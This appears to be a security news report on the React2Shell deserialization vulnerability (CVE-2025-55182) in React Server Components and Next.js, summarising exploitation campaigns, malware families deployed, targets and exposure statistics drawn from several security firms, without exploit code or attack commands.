Critical CVE-2025-55182 vulnerability triggers mass exploitation across React and Next.js ecosystems
A critical vulnerability known as React2Shell (CVE-2025-55182 – CVSS 10.0) has rapidly escalated into a global exploitation wave, impacting more than 137,000 exposed servers worldwide.
The severity of the issue prompted CISA to issue an urgent directive requiring U.S. federal agencies to apply patches before December 12, 2025.
Technical Overview
The vulnerability affects the React Server Components (RSC) Flight protocol and stems from unsafe deserialization. Exploitation allows attackers to execute privileged JavaScript code on the server via a single crafted HTTP request — without:
- Authentication
- User interaction
- Elevated privileges
Although initially associated with React, the impact extends across frameworks built around the ecosystem, including:
- Next.js
- Waku
- Vite
- React Router
- RedwoodSDK
Active Exploitation Campaigns
Since public disclosure on December 3, 2025, multiple threat actors have actively weaponized the flaw in campaigns involving:
- Reconnaissance
- Malware delivery
- Botnet deployment
- Cryptocurrency mining
Cloudflare and Wiz reported that most attacks are targeting internet-exposed Next.js applications, particularly those running in:
- Kubernetes environments
- Managed cloud services
Attackers have conducted large-scale internet scanning to identify vulnerable hosts. Notably, some scanning campaigns excluded Chinese IP ranges while heavily targeting networks in:
- Taiwan
- Xinjiang Uyghur region
- Vietnam
- Japan
- New Zealand
This pattern suggests potential geopolitical targeting rather than purely opportunistic exploitation.
Targets and Impact
Observed targets include:
- Government (.gov) websites
- Universities and research institutions
- Organizations involved in nuclear fuel and strategic materials
Kaspersky recorded more than 35,000 exploitation attempts in a single day (December 10). Attack chains typically began with simple reconnaissance commands such as whoami, followed by payload deployment, including:
- Mirai and Gafgyt botnets
- Cryptocurrency miners
- Cobalt Strike and Sliver frameworks
- FRP and Nezha tools
- Node.js malware leveraging TruffleHog and Gitleaks to extract secrets
- Go-based backdoors with reverse shell and C2 capabilities
Exploit Proliferation
VulnCheck identified over 140 proof-of-concept exploits circulating publicly. Approximately half were non-functional or misleading, but others incorporated:
- In-memory web shells (e.g., Godzilla)
- Automated scanning frameworks
- Lightweight WAF implants deployed post-compromise
Investigators also uncovered an open directory containing exploitation scripts and target lists including more than 35,000 domains and nearly 600 URLs belonging to well-known companies — indicating structured and organized scanning operations.
Exposure Statistics
According to The Shadowserver Foundation:
- Over 137,200 IP addresses are currently exposed
- Approximately 88,900 are located in the United States
- Germany, France, and India follow in exposure volume
Security firm Coalition compared React2Shell to Log4Shell, describing it as a:
“Systemic cyber risk aggregation event.”
Conclusion
Any organization operating internet-exposed React or Next.js applications without applying patches is already at risk.
At this stage, the question is no longer if exploitation will occur — but when.
Sources:
CISA
Cloudflare
Wiz
Kaspersky
VulnCheck
The Shadowserver Foundation
The Hacker News